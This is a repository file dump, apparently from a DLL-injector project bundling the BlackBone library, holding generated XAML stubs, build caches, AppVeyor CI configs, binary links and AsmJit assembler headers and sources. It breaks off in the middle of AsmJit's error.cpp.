"C:\Users\rmt01\Dropbox\WindowsBox\Kodning\Fusk\Injector\C++\Xenos-master\BlackBone\App1\MainPage.xaml" "{406ea660-64cf-4c82-b6f0-42d48172a799}" "73D91C354E632B98F8D85E79E2ACF362" 2 | //------------------------------------------------------------------------------ 3 | // 4 | // This code was generated by a tool. 5 | // 6 | // Changes to this file may cause incorrect behavior and will be lost if 7 | // the code is regenerated. 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | namespace App1 12 | { 13 | partial class MainPage : global::Windows.UI.Xaml.Controls.Page 14 | { 15 | 16 | 17 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.Windows.UI.Xaml.Build.Tasks"," 14.0.0.0")] 18 | private bool _contentLoaded; 19 | 20 | /// 21 | /// InitializeComponent() 22 | /// 23 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.Windows.UI.Xaml.Build.Tasks"," 14.0.0.0")] 24 | [global::System.Diagnostics.DebuggerNonUserCodeAttribute()] 25 | public void InitializeComponent() 26 | { 27 | if (_contentLoaded) 28 | return; 29 | 30 | _contentLoaded = true; 31 | 32 | global::System.Uri resourceLocator = new global::System.Uri("ms-appx:///MainPage.xaml"); 33 | global::Windows.UI.Xaml.Application.LoadComponent(this, resourceLocator, global::Windows.UI.Xaml.Controls.Primitives.ComponentResourceLocation.Application); 34 | } 35 | 36 | } 37 | } 38 | 39 | 40 | -------------------------------------------------------------------------------- /BlackBone/App1/obj/ARM/Debug/XamlSaveStateFile.xml: -------------------------------------------------------------------------------- 1 |  -------------------------------------------------------------------------------- /BlackBone/App1/obj/ARM/Release/App.g.i.cs: -------------------------------------------------------------------------------- 1 | #pragma checksum "C:\Users\rmt01\Dropbox\WindowsBox\Kodning\Fusk\Injector\C++\Xenos-master\BlackBone\App1\App.xaml" "{406ea660-64cf-4c82-b6f0-42d48172a799}" "A57A6474CE005A5AD1777F980C75F16B" 2 | //------------------------------------------------------------------------------ 3 | // 4 | // This code was generated by a tool. 5 | // 6 | // Changes to this file may cause incorrect behavior and will be lost if 7 | // the code is regenerated. 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | 12 | namespace App1 13 | { 14 | #if !DISABLE_XAML_GENERATED_MAIN 15 | /// 16 | /// Program class 17 | /// 18 | public static class Program 19 | { 20 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.Windows.UI.Xaml.Build.Tasks"," 14.0.0.0")] 21 | [global::System.Diagnostics.DebuggerNonUserCodeAttribute()] 22 | static void Main(string[] args) 23 | { 24 | global::Windows.UI.Xaml.Application.Start((p) => new App()); 25 | } 26 | } 27 | #endif 28 | 29 | partial class App : global::Windows.UI.Xaml.Application 30 | { 31 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.Windows.UI.Xaml.Build.Tasks"," 14.0.0.0")] 32 | private bool _contentLoaded; 33 | /// 34 | /// InitializeComponent() 35 | /// 36 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.Windows.UI.Xaml.Build.Tasks"," 14.0.0.0")] 37 | [global::System.Diagnostics.DebuggerNonUserCodeAttribute()] 38 | public void InitializeComponent() 39 | { 40 | if (_contentLoaded) 41 | return; 42 | 43 | _contentLoaded = true; 44 | #if DEBUG && !DISABLE_XAML_GENERATED_BINDING_DEBUG_OUTPUT 45 | DebugSettings.BindingFailed += (sender, args) => 46 | { 47 | global::System.Diagnostics.Debug.WriteLine(args.Message); 48 | }; 49 | #endif 50 | #if DEBUG && !DISABLE_XAML_GENERATED_BREAK_ON_UNHANDLED_EXCEPTION 51 | UnhandledException += (sender, e) => 52 | { 53 | if (global::System.Diagnostics.Debugger.IsAttached) global::System.Diagnostics.Debugger.Break(); 54 | }; 55 | #endif 56 | } 57 | } 58 | } 59 | 60 | -------------------------------------------------------------------------------- /BlackBone/App1/obj/ARM/Release/CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 1a1d37b5813ad2c2ec344b0ec7889a8baf4181bd 2 | -------------------------------------------------------------------------------- /BlackBone/App1/obj/ARM/Release/MainPage.g.i.cs: -------------------------------------------------------------------------------- 1 | #pragma checksum "C:\Users\rmt01\Dropbox\WindowsBox\Kodning\Fusk\Injector\C++\Xenos-master\BlackBone\App1\MainPage.xaml" "{406ea660-64cf-4c82-b6f0-42d48172a799}" "73D91C354E632B98F8D85E79E2ACF362" 2 | //------------------------------------------------------------------------------ 3 | // 4 | // This code was generated by a tool. 5 | // 6 | // Changes to this file may cause incorrect behavior and will be lost if 7 | // the code is regenerated. 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | namespace App1 12 | { 13 | partial class MainPage : global::Windows.UI.Xaml.Controls.Page 14 | { 15 | 16 | 17 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.Windows.UI.Xaml.Build.Tasks"," 14.0.0.0")] 18 | private bool _contentLoaded; 19 | 20 | /// 21 | /// InitializeComponent() 22 | /// 23 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.Windows.UI.Xaml.Build.Tasks"," 14.0.0.0")] 24 | [global::System.Diagnostics.DebuggerNonUserCodeAttribute()] 25 | public void InitializeComponent() 26 | { 27 | if (_contentLoaded) 28 | return; 29 | 30 | _contentLoaded = true; 31 | 32 | global::System.Uri resourceLocator = new global::System.Uri("ms-appx:///MainPage.xaml"); 33 | global::Windows.UI.Xaml.Application.LoadComponent(this, resourceLocator, global::Windows.UI.Xaml.Controls.Primitives.ComponentResourceLocation.Application); 34 | } 35 | 36 | } 37 | } 38 | 39 | 40 | -------------------------------------------------------------------------------- /BlackBone/App1/obj/ARM/Release/XamlSaveStateFile.xml: -------------------------------------------------------------------------------- 1 |  -------------------------------------------------------------------------------- /BlackBone/App1/obj/App1.csproj.nuget.g.props: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | True 5 | NuGet 6 | C:\Users\rmt01\Dropbox\WindowsBox\Kodning\Fusk\Injector\C++\Xenos-master\BlackBone\App1\obj\project.assets.json 7 | $(UserProfile)\.nuget\packages\ 8 | C:\Users\rmt01\.nuget\packages\ 9 | PackageReference 10 | 4.2.0 11 | 12 | 13 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 14 | 15 | -------------------------------------------------------------------------------- /BlackBone/App1/obj/App1.csproj.nuget.g.targets: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 5 | 6 | -------------------------------------------------------------------------------- /BlackBone/App1/obj/x64/Debug/App.g.i.cs: -------------------------------------------------------------------------------- 1 | #pragma checksum "C:\Users\rmt01\Dropbox\WindowsBox\Kodning\Fusk\Injector\C++\Xenos-master\BlackBone\App1\App.xaml" "{406ea660-64cf-4c82-b6f0-42d48172a799}" "A57A6474CE005A5AD1777F980C75F16B" 2 | //------------------------------------------------------------------------------ 3 | // 4 | // This code was generated by a tool. 5 | // 6 | // Changes to this file may cause incorrect behavior and will be lost if 7 | // the code is regenerated. 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | 12 | namespace App1 13 | { 14 | #if !DISABLE_XAML_GENERATED_MAIN 15 | /// 16 | /// Program class 17 | /// 18 | public static class Program 19 | { 20 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.Windows.UI.Xaml.Build.Tasks"," 14.0.0.0")] 21 | [global::System.Diagnostics.DebuggerNonUserCodeAttribute()] 22 | static void Main(string[] args) 23 | { 24 | global::Windows.UI.Xaml.Application.Start((p) => new App()); 25 | } 26 | } 27 | #endif 28 | 29 | partial class App : global::Windows.UI.Xaml.Application 30 | { 31 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.Windows.UI.Xaml.Build.Tasks"," 14.0.0.0")] 32 | private bool _contentLoaded; 33 | /// 34 | /// InitializeComponent() 35 | /// 36 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.Windows.UI.Xaml.Build.Tasks"," 14.0.0.0")] 37 | [global::System.Diagnostics.DebuggerNonUserCodeAttribute()] 38 | public void InitializeComponent() 39 | { 40 | if (_contentLoaded) 41 | return; 42 | 43 | _contentLoaded = true; 44 | #if DEBUG && !DISABLE_XAML_GENERATED_BINDING_DEBUG_OUTPUT 45 | DebugSettings.BindingFailed += (sender, args) => 46 | { 47 | global::System.Diagnostics.Debug.WriteLine(args.Message); 48 | }; 49 | #endif 50 | #if DEBUG && !DISABLE_XAML_GENERATED_BREAK_ON_UNHANDLED_EXCEPTION 51 | UnhandledException += (sender, e) => 52 | { 53 | if (global::System.Diagnostics.Debugger.IsAttached) global::System.Diagnostics.Debugger.Break(); 54 | }; 55 | #endif 56 | } 57 | } 58 | } 59 | 60 | -------------------------------------------------------------------------------- /BlackBone/App1/obj/x64/Debug/CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | cfd3df73dcb61a7f7330ec7879c3e9144f93f848 2 | -------------------------------------------------------------------------------- /BlackBone/App1/obj/x64/Debug/MainPage.g.i.cs: -------------------------------------------------------------------------------- 1 | #pragma checksum "C:\Users\rmt01\Dropbox\WindowsBox\Kodning\Fusk\Injector\C++\Xenos-master\BlackBone\App1\MainPage.xaml" "{406ea660-64cf-4c82-b6f0-42d48172a799}" "73D91C354E632B98F8D85E79E2ACF362" 2 | //------------------------------------------------------------------------------ 3 | // 4 | // This code was generated by a tool. 5 | // 6 | // Changes to this file may cause incorrect behavior and will be lost if 7 | // the code is regenerated. 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | namespace App1 12 | { 13 | partial class MainPage : global::Windows.UI.Xaml.Controls.Page 14 | { 15 | 16 | 17 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.Windows.UI.Xaml.Build.Tasks"," 14.0.0.0")] 18 | private bool _contentLoaded; 19 | 20 | /// 21 | /// InitializeComponent() 22 | /// 23 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.Windows.UI.Xaml.Build.Tasks"," 14.0.0.0")] 24 | [global::System.Diagnostics.DebuggerNonUserCodeAttribute()] 25 | public void InitializeComponent() 26 | { 27 | if (_contentLoaded) 28 | return; 29 | 30 | _contentLoaded = true; 31 | 32 | global::System.Uri resourceLocator = new global::System.Uri("ms-appx:///MainPage.xaml"); 33 | global::Windows.UI.Xaml.Application.LoadComponent(this, resourceLocator, global::Windows.UI.Xaml.Controls.Primitives.ComponentResourceLocation.Application); 34 | } 35 | 36 | } 37 | } 38 | 39 | 40 | -------------------------------------------------------------------------------- /BlackBone/App1/obj/x64/Debug/XamlSaveStateFile.xml: -------------------------------------------------------------------------------- 1 |  -------------------------------------------------------------------------------- /BlackBone/App1/obj/x64/Release/CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 091264f345e43848822a57df92329b32b7c1402b 2 | -------------------------------------------------------------------------------- /BlackBone/App1/obj/x64/Release/MainPage.g.i.cs: -------------------------------------------------------------------------------- 1 | #pragma checksum "C:\Users\rmt01\Dropbox\WindowsBox\Kodning\Fusk\Injector\C++\Xenos-master\BlackBone\App1\MainPage.xaml" "{406ea660-64cf-4c82-b6f0-42d48172a799}" "73D91C354E632B98F8D85E79E2ACF362" 2 | //------------------------------------------------------------------------------ 3 | // 4 | // This code was generated by a tool. 5 | // 6 | // Changes to this file may cause incorrect behavior and will be lost if 7 | // the code is regenerated. 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | namespace App1 12 | { 13 | partial class MainPage : global::Windows.UI.Xaml.Controls.Page 14 | { 15 | 16 | 17 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.Windows.UI.Xaml.Build.Tasks"," 14.0.0.0")] 18 | private bool _contentLoaded; 19 | 20 | /// 21 | /// InitializeComponent() 22 | /// 23 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.Windows.UI.Xaml.Build.Tasks"," 14.0.0.0")] 24 | [global::System.Diagnostics.DebuggerNonUserCodeAttribute()] 25 | public void InitializeComponent() 26 | { 27 | if (_contentLoaded) 28 | return; 29 | 30 | _contentLoaded = true; 31 | 32 | global::System.Uri resourceLocator = new global::System.Uri("ms-appx:///MainPage.xaml"); 33 | global::Windows.UI.Xaml.Application.LoadComponent(this, resourceLocator, global::Windows.UI.Xaml.Controls.Primitives.ComponentResourceLocation.Application); 34 | } 35 | 36 | } 37 | } 38 | 39 | 40 | -------------------------------------------------------------------------------- /BlackBone/App1/obj/x64/Release/XamlSaveStateFile.xml: -------------------------------------------------------------------------------- 1 |  -------------------------------------------------------------------------------- /BlackBone/App1/obj/x86/Debug/CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | d931ed3b3a9a4c98f4ed9793bdf6da213793dd1e 2 | -------------------------------------------------------------------------------- /BlackBone/App1/obj/x86/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/BlackBone/App1/obj/x86/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /BlackBone/App1/obj/x86/Debug/MainPage.g.i.cs: -------------------------------------------------------------------------------- 1 | #pragma checksum "C:\Users\rmt01\Dropbox\WindowsBox\Kodning\Fusk\Injector\C++\Xenos-master\BlackBone\App1\MainPage.xaml" "{406ea660-64cf-4c82-b6f0-42d48172a799}" "73D91C354E632B98F8D85E79E2ACF362" 2 | //------------------------------------------------------------------------------ 3 | // 4 | // This code was generated by a tool. 5 | // 6 | // Changes to this file may cause incorrect behavior and will be lost if 7 | // the code is regenerated. 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | namespace App1 12 | { 13 | partial class MainPage : global::Windows.UI.Xaml.Controls.Page 14 | { 15 | 16 | 17 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.Windows.UI.Xaml.Build.Tasks"," 14.0.0.0")] 18 | private bool _contentLoaded; 19 | 20 | /// 21 | /// InitializeComponent() 22 | /// 23 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.Windows.UI.Xaml.Build.Tasks"," 14.0.0.0")] 24 | [global::System.Diagnostics.DebuggerNonUserCodeAttribute()] 25 | public void InitializeComponent() 26 | { 27 | if (_contentLoaded) 28 | return; 29 | 30 | _contentLoaded = true; 31 | 32 | global::System.Uri resourceLocator = new global::System.Uri("ms-appx:///MainPage.xaml"); 33 | global::Windows.UI.Xaml.Application.LoadComponent(this, resourceLocator, global::Windows.UI.Xaml.Controls.Primitives.ComponentResourceLocation.Application); 34 | } 35 | 36 | } 37 | } 38 | 39 | 40 | -------------------------------------------------------------------------------- /BlackBone/App1/obj/x86/Debug/XamlSaveStateFile.xml: -------------------------------------------------------------------------------- 1 |  -------------------------------------------------------------------------------- /BlackBone/App1/obj/x86/Release/CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 59917eb4f2d63f28600a9c24289019abf71578e5 2 | -------------------------------------------------------------------------------- /BlackBone/App1/obj/x86/Release/MainPage.g.i.cs: -------------------------------------------------------------------------------- 1 | #pragma checksum "C:\Users\rmt01\Dropbox\WindowsBox\Kodning\Fusk\Injector\C++\Xenos-master\BlackBone\App1\MainPage.xaml" "{406ea660-64cf-4c82-b6f0-42d48172a799}" "73D91C354E632B98F8D85E79E2ACF362" 2 | //------------------------------------------------------------------------------ 3 | // 4 | // This code was generated by a tool. 5 | // 6 | // Changes to this file may cause incorrect behavior and will be lost if 7 | // the code is regenerated. 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | namespace App1 12 | { 13 | partial class MainPage : global::Windows.UI.Xaml.Controls.Page 14 | { 15 | 16 | 17 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.Windows.UI.Xaml.Build.Tasks"," 14.0.0.0")] 18 | private bool _contentLoaded; 19 | 20 | /// 21 | /// InitializeComponent() 22 | /// 23 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.Windows.UI.Xaml.Build.Tasks"," 14.0.0.0")] 24 | [global::System.Diagnostics.DebuggerNonUserCodeAttribute()] 25 | public void InitializeComponent() 26 | { 27 | if (_contentLoaded) 28 | return; 29 | 30 | _contentLoaded = true; 31 | 32 | global::System.Uri resourceLocator = new global::System.Uri("ms-appx:///MainPage.xaml"); 33 | global::Windows.UI.Xaml.Application.LoadComponent(this, resourceLocator, global::Windows.UI.Xaml.Controls.Primitives.ComponentResourceLocation.Application); 34 | } 35 | 36 | } 37 | } 38 | 39 | 40 | -------------------------------------------------------------------------------- /BlackBone/App1/obj/x86/Release/XamlSaveStateFile.xml: -------------------------------------------------------------------------------- 1 |  -------------------------------------------------------------------------------- /BlackBone/appveyor.yml: -------------------------------------------------------------------------------- 1 | version: 1.0.{build} 2 | 3 | branches: 4 | only: 5 | - master 6 | 7 | image: Visual Studio 2017 8 | clone_folder: c:\projects\blackbone 9 | 10 | platform: 11 | - Win32 12 | - x64 13 | 14 | configuration: 15 | - Debug 16 | - Debug(DLL) 17 | - Release 18 | - Release(DLL) 19 | 20 | build: 21 | parallel: true 22 | project: BlackBone.sln 23 | 24 | skip_commits: 25 | message: /Driver/ -------------------------------------------------------------------------------- /BlackBone/appveyor_drv.yml: -------------------------------------------------------------------------------- 1 | version: 1.0.{build} 2 | 3 | branches: 4 | only: 5 | - master 6 | 7 | image: Visual Studio 2015 8 | clone_folder: c:\projects\blackboneDrv 9 | 10 | platform: 11 | - x64 12 | 13 | configuration: 14 | - Win10Debug 15 | - Win10Release 16 | - Win8.1 Debug 17 | - Win8.1 Release 18 | - Win8 Debug 19 | - Win8 Release 20 | - Win7 Debug 21 | - Win7 Release 22 | 23 | build: 24 | parallel: true 25 | project: src/BlackBoneDrv/BlackBoneDrv.sln 26 | 27 | only_commits: 28 | message: /Driver/ -------------------------------------------------------------------------------- /BlackBone/build/Win32/Debug/BeaEngineCheetah.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/BlackBone/build/Win32/Debug/BeaEngineCheetah.dll -------------------------------------------------------------------------------- /BlackBone/build/Win32/Debug/BlackBone.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/BlackBone/build/Win32/Debug/BlackBone.pdb -------------------------------------------------------------------------------- /BlackBone/build/Win32/Debug/TestApp.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/BlackBone/build/Win32/Debug/TestApp.exe -------------------------------------------------------------------------------- /BlackBone/build/Win32/Debug/TestApp.exp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/BlackBone/build/Win32/Debug/TestApp.exp -------------------------------------------------------------------------------- /BlackBone/build/Win32/Debug/TestApp.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/BlackBone/build/Win32/Debug/TestApp.lib -------------------------------------------------------------------------------- /BlackBone/build/Win32/Debug/TestApp.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/BlackBone/build/Win32/Debug/TestApp.pdb -------------------------------------------------------------------------------- /BlackBone/contrib/AsmJit/ApiBegin.h: -------------------------------------------------------------------------------- 1 | // [AsmJit] 2 | // Complete x86/x64 JIT and Remote Assembler for C++. 3 | // 4 | // [License] 5 | // Zlib - See LICENSE.md file in the package. 6 | 7 | #if !defined(_ASMJIT_BUILD_H) 8 | #include "build.h" 9 | #endif // !_ASMJIT_BUILD_H 10 | 11 | // ============================================================================ 12 | // [MSVC] 13 | // ============================================================================ 14 | 15 | #if defined(_MSC_VER) 16 | // Disable some warnings we know about 17 | # pragma warning(push) 18 | # pragma warning(disable: 4127) // conditional expression is constant 19 | # pragma warning(disable: 4201) // nameless struct/union 20 | # pragma warning(disable: 4244) // '+=' : conversion from 'int' to 'x', possible 21 | // loss of data 22 | # pragma warning(disable: 4251) // struct needs to have dll-interface to be used 23 | // by clients of struct ... 24 | # pragma warning(disable: 4275) // non dll-interface struct ... used as base for 25 | // dll-interface struct 26 | # pragma warning(disable: 4355) // this used in base member initializer list 27 | # pragma warning(disable: 4480) // specifying underlying type for enum 28 | # pragma warning(disable: 4800) // forcing value to bool 'true' or 'false' 29 | 30 | // Rename symbols. 31 | # if !defined(vsnprintf) 32 | # define ASMJIT_DEFINED_VSNPRINTF 33 | # define vsnprintf _vsnprintf 34 | # endif // !vsnprintf 35 | # if !defined(snprintf) 36 | # define ASMJIT_DEFINED_SNPRINTF 37 | # define snprintf _snprintf 38 | # endif // !snprintf 39 | #endif // _MSC_VER 40 | 41 | // ============================================================================ 42 | // [GNUC] 43 | // ============================================================================ 44 | 45 | #if defined(__GNUC__) && !defined(__clang__) 46 | # if __GNUC__ >= 4 && !defined(__MINGW32__) 47 | # pragma GCC visibility push(hidden) 48 | # endif // __GNUC__ >= 4 49 | #endif // __GNUC__ 50 | -------------------------------------------------------------------------------- /BlackBone/contrib/AsmJit/ApiEnd.h: -------------------------------------------------------------------------------- 1 | // [AsmJit] 2 | // Complete x86/x64 JIT and Remote Assembler for C++. 3 | // 4 | // [License] 5 | // Zlib - See LICENSE.md file in the package. 6 | 7 | // ============================================================================ 8 | // [MSVC] 9 | // ============================================================================ 10 | 11 | #if defined(_MSC_VER) 12 | // Pop disabled warnings by ApiBegin.h 13 | # pragma warning(pop) 14 | // Rename symbols back. 15 | # if defined(ASMJIT_DEFINED_VSNPRINTF) 16 | # undef ASMJIT_DEFINED_VSNPRINTF 17 | # undef vsnprintf 18 | # endif // ASMJIT_DEFINED_VSNPRINTF 19 | # if defined(ASMJIT_DEFINED_SNPRINTF) 20 | # undef ASMJIT_DEFINED_SNPRINTF 21 | # undef snprintf 22 | # endif // ASMJIT_DEFINED_SNPRINTF 23 | #endif // _MSC_VER 24 | 25 | // ============================================================================ 26 | // [GNUC] 27 | // ============================================================================ 28 | 29 | #if defined(__GNUC__) && !defined(__clang__) 30 | # if __GNUC__ >= 4 && !defined(__MINGW32__) 31 | # pragma GCC visibility pop 32 | # endif // __GNUC__ >= 4 33 | #endif // __GNUC__ 34 | -------------------------------------------------------------------------------- /BlackBone/contrib/AsmJit/LICENSE.md: -------------------------------------------------------------------------------- 1 | AsmJit - Complete x86/x64 JIT and Remote Assembler for C++ 2 | Copyright (c) 2008-2014, Petr Kobalicek 3 | 4 | This software is provided 'as-is', without any express or implied 5 | warranty. In no event will the authors be held liable for any damages 6 | arising from the use of this software. 7 | 8 | Permission is granted to anyone to use this software for any purpose, 9 | including commercial applications, and to alter it and redistribute it 10 | freely, subject to the following restrictions: 11 | 12 | 1. The origin of this software must not be misrepresented; you must not 13 | claim that you wrote the original software. If you use this software 14 | in a product, an acknowledgment in the product documentation would be 15 | appreciated but is not required. 16 | 2. Altered source versions must be plainly marked as such, and must not be 17 | misrepresented as being the original software. 18 | 3. This notice may not be removed or altered from any source distribution. 19 | -------------------------------------------------------------------------------- /BlackBone/contrib/AsmJit/base.h: -------------------------------------------------------------------------------- 1 | // [AsmJit] 2 | // Complete x86/x64 JIT and Remote Assembler for C++. 3 | // 4 | // [License] 5 | // Zlib - See LICENSE.md file in the package. 6 | 7 | // [Guard] 8 | #ifndef _ASMJIT_BASE_H 9 | #define _ASMJIT_BASE_H 10 | 11 | // [Dependencies - AsmJit] 12 | #include "build.h" 13 | 14 | #include "base/assembler.h" 15 | #include "base/codegen.h" 16 | #include "base/compiler.h" 17 | #include "base/constpool.h" 18 | #include "base/containers.h" 19 | #include "base/cpuinfo.h" 20 | #include "base/cputicks.h" 21 | #include "base/error.h" 22 | #include "base/globals.h" 23 | #include "base/intutil.h" 24 | #include "base/lock.h" 25 | #include "base/logger.h" 26 | #include "base/operand.h" 27 | #include "base/runtime.h" 28 | #include "base/string.h" 29 | #include "base/vectypes.h" 30 | #include "base/vmem.h" 31 | #include "base/zone.h" 32 | 33 | // [Guard] 34 | #endif // _ASMJIT_BASE_H 35 | -------------------------------------------------------------------------------- /BlackBone/contrib/AsmJit/base/cpuinfo.cpp: -------------------------------------------------------------------------------- 1 | // [AsmJit] 2 | // Complete x86/x64 JIT and Remote Assembler for C++. 3 | // 4 | // [License] 5 | // Zlib - See LICENSE.md file in the package. 6 | 7 | // [Export] 8 | #define ASMJIT_EXPORTS 9 | 10 | // [Dependencies - AsmJit] 11 | #include "../base/cpuinfo.h" 12 | 13 | #if defined(ASMJIT_HOST_X86) || defined(ASMJIT_HOST_X64) 14 | #include "../x86/x86cpuinfo.h" 15 | #else 16 | // ? 17 | #endif // ASMJIT_HOST || ASMJIT_HOST_X64 18 | 19 | // [Dependencies - Posix] 20 | #if defined(ASMJIT_OS_POSIX) 21 | # include 22 | # include 23 | # include 24 | # include 25 | #endif // ASMJIT_OS_POSIX 26 | 27 | // [Api-Begin] 28 | #include "../apibegin.h" 29 | 30 | namespace asmjit { 31 | 32 | // ============================================================================ 33 | // [asmjit::CpuInfo - DetectHwThreadsCount] 34 | // ============================================================================ 35 | 36 | uint32_t CpuInfo::detectHwThreadsCount() { 37 | #if defined(ASMJIT_OS_WINDOWS) 38 | SYSTEM_INFO info; 39 | ::GetSystemInfo(&info); 40 | return info.dwNumberOfProcessors; 41 | #elif defined(ASMJIT_OS_POSIX) && defined(_SC_NPROCESSORS_ONLN) 42 | // It seems that sysconf returns the number of "logical" processors on both 43 | // mac and linux. So we get the number of "online logical" processors. 44 | long res = ::sysconf(_SC_NPROCESSORS_ONLN); 45 | if (res == -1) return 1; 46 | 47 | return static_cast(res); 48 | #else 49 | return 1; 50 | #endif 51 | } 52 | 53 | // ============================================================================ 54 | // [asmjit::CpuInfo - GetHost] 55 | // ============================================================================ 56 | 57 | #if defined(ASMJIT_HOST_X86) || defined(ASMJIT_HOST_X64) 58 | struct AutoX86CpuInfo : public X86CpuInfo { 59 | ASMJIT_INLINE AutoX86CpuInfo() : X86CpuInfo() { 60 | X86CpuUtil::detect(this); 61 | } 62 | }; 63 | #else 64 | #error "AsmJit - Unsupported CPU." 65 | #endif // ASMJIT_HOST || ASMJIT_HOST_X64 66 | 67 | const CpuInfo* CpuInfo::getHost() { 68 | #if defined(ASMJIT_HOST_X86) || defined(ASMJIT_HOST_X64) 69 | static AutoX86CpuInfo cpuInfo; 70 | #else 71 | #error "AsmJit - Unsupported CPU." 72 | #endif // ASMJIT_HOST || ASMJIT_HOST_X64 73 | return &cpuInfo; 74 | } 75 | 76 | } // asmjit namespace 77 | 78 | // [Api-End] 79 | #include "../apiend.h" 80 | -------------------------------------------------------------------------------- /BlackBone/contrib/AsmJit/base/cputicks.h: -------------------------------------------------------------------------------- 1 | // [AsmJit] 2 | // Complete x86/x64 JIT and Remote Assembler for C++. 3 | // 4 | // [License] 5 | // Zlib - See LICENSE.md file in the package. 6 | 7 | // [Guard] 8 | #ifndef _ASMJIT_BASE_CPUTICKS_H 9 | #define _ASMJIT_BASE_CPUTICKS_H 10 | 11 | // [Dependencies - AsmJit] 12 | #include "../base/globals.h" 13 | 14 | // [Api-Begin] 15 | #include "../apibegin.h" 16 | 17 | namespace asmjit { 18 | 19 | //! \addtogroup asmjit_base_util 20 | //! \{ 21 | 22 | // ============================================================================ 23 | // [asmjit::CpuTicks] 24 | // ============================================================================ 25 | 26 | //! CPU ticks utilities. 27 | struct CpuTicks { 28 | //! Get the current CPU ticks for benchmarking (1ms resolution). 29 | static ASMJIT_API uint32_t now(); 30 | }; 31 | 32 | //! \} 33 | 34 | } // asmjit namespace 35 | 36 | // [Api-End] 37 | #include "../apiend.h" 38 | 39 | // [Guard] 40 | #endif // _ASMJIT_BASE_CPUTICKS_H 41 | -------------------------------------------------------------------------------- /BlackBone/contrib/AsmJit/base/error.cpp: -------------------------------------------------------------------------------- 1 | // [AsmJit] 2 | // Complete x86/x64 JIT and Remote Assembler for C++. 3 | // 4 | // [License] 5 | // Zlib - See LICENSE.md file in the package. 6 | 7 | // [Export] 8 | #define ASMJIT_EXPORTS 9 | 10 | // [Dependencies - AsmJit] 11 | #include "../base/error.h" 12 | #include "../base/intutil.h" 13 | 14 | // [Api-Begin] 15 | #include "../apibegin.h" 16 | 17 | namespace asmjit { 18 | 19 | // ============================================================================ 20 | // [asmjit::ErrorHandler - Construction / Destruction] 21 | // ============================================================================ 22 | 23 | ErrorHandler::ErrorHandler() {} 24 | ErrorHandler::~ErrorHandler() {} 25 | 26 | // ============================================================================ 27 | // [asmjit::ErrorHandler - Interface] 28 | // ============================================================================ 29 | 30 | ErrorHandler* ErrorHandler::addRef() const { 31 | return const_cast(this); 32 | } 33 | 34 | void ErrorHandler::release() {} 35 | 36 | // ============================================================================ 37 | // [asmjit::ErrorUtil - AsString] 38 | // ============================================================================ 39 | 40 | #if !defined(ASMJIT_DISABLE_NAMES) 41 | static const char errorMessages[] = { 42 | "Ok\0" 43 | "No heap memory\0" 44 | "No virtual memory\0" 45 | "Invalid argument\0" 46 | "Invalid state\0" 47 | "No code generated\0" 48 | "Code too large\0" 49 | "Label already bound\0" 50 | "Unknown instruction\0" 51 | "Illegal instruction\0" 52 | "Illegal addressing\0" 53 | "Illegal displacement\0" 54 | "Overlapped arguments\0" 55 | "Unknown error\0" 56 | }; 57 | 58 | static const char* findPackedString(const char* p, uint32_t id, uint32_t maxId) { 59 | uint32_t i = 0; 60 | 61 | if (id > maxId) 62 | id = maxId; 63 | 64 | while (i < id) { 65 | while (p[0]) 66 | p++; 67 | 68 | p++; 69 | 